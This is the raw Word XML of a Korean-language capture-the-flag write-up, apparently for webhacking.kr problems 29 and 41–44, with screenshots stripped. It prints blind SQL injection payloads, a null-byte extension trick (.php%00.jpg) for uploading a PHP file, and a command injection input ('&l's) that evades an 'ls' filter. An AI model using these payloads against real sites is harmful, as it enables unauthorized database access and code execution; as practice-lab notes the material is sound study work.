      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E7E72">
        <w:t>=guest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 했을 때 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 나오는 것을 보아</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7E72" w:rsidRDefault="008E7E72" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elect </w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:t xml:space="preserve">(id, pw, no) from prob29_tb where id=’$_GET[id]’ and pw=’$_GET[pw]’ and no=’$_GET[no]’ </w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 s</w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:t xml:space="preserve">elect </w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문을 추측할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉,</w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidR="00CC2134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만 알면 모든 값을 가져올 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2134" w:rsidRDefault="00CC2134" w:rsidP="009362BA">
      <w:r w:rsidRPr="00CC2134">
        <w:t>no=2||length(pw)=10&amp;id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2134">
        <w:t>guest&amp;pw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2134">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2134">
        <w:t>gues</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 통해</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pw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임을 알았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2134" w:rsidRDefault="00CC4FE1" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이제 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pw,1,1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 해서 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 나오는 것을 찾으면 된다. </w:t>
      </w:r>
      <w:r>
        <w:t>guest, failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>은 버려야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A63" w:rsidRDefault="005B1A63" w:rsidP="009362BA">
      <w:r w:rsidRPr="005B1A63">
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>(pw,1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1A63">
        <w:t>'a',0,1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008097E" w:rsidRDefault="0008097E" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이면 </w:t>
      </w:r>
      <w:r>
        <w:t>Failure, 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008097E" w:rsidRDefault="0008097E" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0192DC17" wp14:editId="204EC08F">
            <wp:extent cx="1295400" cy="647700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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A37F79" wp14:editId="29428A4A">
            <wp:extent cx="4524375" cy="4229100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B31FE1F" wp14:editId="0A6D8AD4">
            <wp:extent cx="2390775" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서버에 너무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걸려 첫 글자만 구하고 구글링을 하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25D0C" w:rsidRDefault="00D25D0C" w:rsidP="009362BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C48EEE" wp14:editId="6BF1122F">
            <wp:extent cx="2771775" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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Pr="009362BA" w:rsidRDefault="009362BA" w:rsidP="009362BA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009362BA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009362BA" w:rsidRDefault="009362BA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4E07A0" wp14:editId="19E38E7D">
            <wp:extent cx="3695700" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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D4" w:rsidRDefault="00791DD4" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283772E8" wp14:editId="1A318537">
            <wp:extent cx="3067050" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="0" b="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1A" w:rsidRDefault="00530F70" w:rsidP="005B6778"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빈 파일이라면 c</w:t>
      </w:r>
      <w:r>
        <w:t>opy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 오류를 낸다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530F70" w:rsidRDefault="00530F70" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그냥 빈 파일로 올리면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eregi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 필터링을 하므로 파일명을 </w:t>
      </w:r>
      <w:r>
        <w:t>“&lt;”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 해보도록 하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530F70" w:rsidRDefault="00530F70" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F42D568" wp14:editId="2CAA9A19">
            <wp:extent cx="5731510" cy="379730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270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0" w:rsidRDefault="00530F70" w:rsidP="005B6778">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>idden_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 알아냈다. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>idden_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/$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에 패스워드를 쓰므로</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530F70" w:rsidRDefault="00530F70" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287EC05E" wp14:editId="3954F588">
            <wp:extent cx="5731510" cy="438785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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0" w:rsidRPr="00530F70" w:rsidRDefault="00530F70" w:rsidP="00530F70">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530F70">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00530F70">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530F70" w:rsidRDefault="00530F70" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1640A665" wp14:editId="265513FD">
            <wp:extent cx="3771900" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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D" w:rsidRDefault="00EC186D" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07761B98" wp14:editId="3E3D4F95">
            <wp:extent cx="5731510" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"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D" w:rsidRDefault="00223F45" w:rsidP="005B6778">
      <w:r>
        <w:t>dGVzdC50eHQ=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">패딩이 붙어있는 것으로 보아 </w:t>
      </w:r>
      <w:r>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인코딩으로 알 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC186D" w:rsidRDefault="00EC186D" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3FD1F0" wp14:editId="6F3625FC">
            <wp:extent cx="1333500" cy="4352925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="400" name="그림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t>복호화 했더니 t</w:t>
      </w:r>
      <w:r>
        <w:t>est.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223F45" w:rsidRDefault="00223F45" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5F1B36" wp14:editId="3C4DFE73">
            <wp:extent cx="1314450" cy="3810000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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t>t</w:t>
      </w:r>
      <w:r>
        <w:t>est.zip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암호화 한다</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223F45" w:rsidRDefault="00223F45" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B05BDBD" wp14:editId="1BED354D">
            <wp:extent cx="5731510" cy="4257040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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lastRenderedPageBreak/>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 얻을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223F45" w:rsidRDefault="00223F45" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C577DD" wp14:editId="52541990">
            <wp:extent cx="4276725" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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D13C25" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46355EFA" wp14:editId="2C59BDC0">
            <wp:extent cx="5191125" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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5" w:rsidRPr="00D13C25" w:rsidRDefault="00D13C25" w:rsidP="00D13C25">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D13C25">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D13C25">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13C25" w:rsidRDefault="00D13C25" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B62D08A" wp14:editId="0F70B81B">
            <wp:extent cx="3771900" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="407" name="그림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5" w:rsidRDefault="00D13C25" w:rsidP="005B6778">
      <w:r>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 올려보겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13C25" w:rsidRDefault="00D13C25" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFED530" wp14:editId="4AB29C36">
            <wp:extent cx="1571625" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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access denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.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확장자를 대문자로(</w:t>
      </w:r>
      <w:r>
        <w:t>x)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확장자를 </w:t>
      </w:r>
      <w:r>
        <w:t>.php3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로(x</w:t>
      </w:r>
      <w:r>
        <w:t>)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확장자를 </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00647F02">
        <w:t>%00</w:t>
      </w:r>
      <w:r>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로(</w:t>
      </w:r>
      <w:r>
        <w:t>o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13C25" w:rsidRDefault="00D13C25" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382A52CA" wp14:editId="5F5A8320">
            <wp:extent cx="3990975" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="409" name="그림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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C9CA387" wp14:editId="45628F53">
            <wp:extent cx="4229100" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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>로 올리지 않으니까 a</w:t>
      </w:r>
      <w:r>
        <w:t>bout blank</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 떠서 이걸로 올렸더니 아이피가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647F02" w:rsidRDefault="00647F02" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="708EEC33" wp14:editId="44F8DFF9">
            <wp:extent cx="5476875" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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 xml:space="preserve">왜 안되지 해서 봤더니 </w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 올려야 클리어가 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>된다.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gram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을 사용하는 것을 감안하여 p</w:t>
      </w:r>
      <w:r>
        <w:t>hp engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 있으니 </w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">만 정답으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해놓았나</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 보다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647F02" w:rsidRDefault="00647F02" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C709E87" wp14:editId="2F936C6A">
            <wp:extent cx="5731510" cy="1910715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="413" name="그림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Pr="00647F02" w:rsidRDefault="00647F02" w:rsidP="00647F02">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647F02">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00647F02">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob44</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647F02" w:rsidRDefault="00647F02" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5003A2D6" wp14:editId="2E44AC4C">
            <wp:extent cx="3438525" cy="666750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"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>1</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 입력하면 인사를 해준다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647F02" w:rsidRDefault="00647F02" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C34D337" wp14:editId="453B5311">
            <wp:extent cx="895350" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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EE4B25" w:rsidP="00D13C25">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 가능한가 싶어</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1&amp;&amp;1, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 넣어주었는데 무반응이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25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파일도 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>없고.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계속 헤매다가 인터넷을 봤다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25">
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Command Injection </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제라니</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 너무 생소했다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 필터링 되어있으므로 </w:t>
      </w:r>
      <w:r>
        <w:t>&amp; (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>백그라운드)와</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">추측하기에 </w:t>
      </w:r>
      <w:r>
        <w:t>echo ‘hello $_POST[input]’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과 같이 되어있을 것이므로</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25">
      <w:r>
        <w:t>‘&amp;l’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같이 입력하면 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029121F" w:rsidRDefault="0029121F" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E43E17" wp14:editId="7C5DA595">
            <wp:extent cx="4743450" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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A03D63" w:rsidP="00D13C25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E6CF48" wp14:editId="0DD30F28">
            <wp:extent cx="5731510" cy="1658620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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Pr="00A03D63" w:rsidRDefault="00A03D63" w:rsidP="00A03D63">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A03D63">
        <w:rPr>
